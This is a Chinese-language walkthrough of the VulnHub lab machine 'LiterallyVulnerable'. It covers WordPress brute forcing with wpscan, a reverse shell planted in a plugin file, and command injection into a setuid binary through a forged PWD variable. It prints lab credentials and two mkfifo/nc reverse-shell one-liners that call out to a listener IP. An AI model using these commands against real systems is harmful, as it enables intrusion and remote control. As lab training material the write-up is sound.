vulnhub >_ LiterallyVulnerable
Published on 09 Nov 2020
LiterallyVulnerable
80
显示不正确,先加个hosts
admin用户确认。
利用之前的密码名单尝试暴力
wpscan --url http://literally.vulnerable/ -e u,vp -P backupPasswords
wpscan
又一个wp
在其中的帖子中发现
看来密码应该是用在这里的
同样的密码名单在65535端口上再次做同样的尝试
maybeadmin
$EPid%J2L9LufO5
登录成功。
在已经发布的页面中查看被密码保护的帖子
一个新的凭证
notadmin:Pa$$w0rd13!&
成功重新登录
登录后台通过修改404提交rshell
报错。尝试修改插件
成功
http://literally.vulnerable:65535/phpcms/wp-content/plugins/akismet/akismet.php
浏览器浏览。在监听端口获得shell
两个用户
分析一下这个二进制程序
尝试运行
所以是抓取了当前路径。echo出来,如果路径指向文件,则能以root越权echo其他用户的文件
同样的我们可以通过伪造目录向这个程序注入命令。
尝试一下
简单的成功注入
再次修改,尝试获得shell,尝试很多种语句,最终确定下面的语句
export PWD=';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.132 1338 >/tmp/f'
./itseasy
成功切换到 john
在目录下枚举
发现john的凭证
john:YZW$s8Y49IB#ZZJ
有凭证之后肯定要查看sudo
html路径权限是www-data权限。
返回之前的shell
通过echo伪造test.html
echo '#!/bin/bash' > test.html
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.132 1339 >/tmp/f' >> test.html
增加运行权限
在1339建立监听
我们已经有john的凭证,直接ssh登录。john
ssh john@192.168.110.135
通过运行获得root shell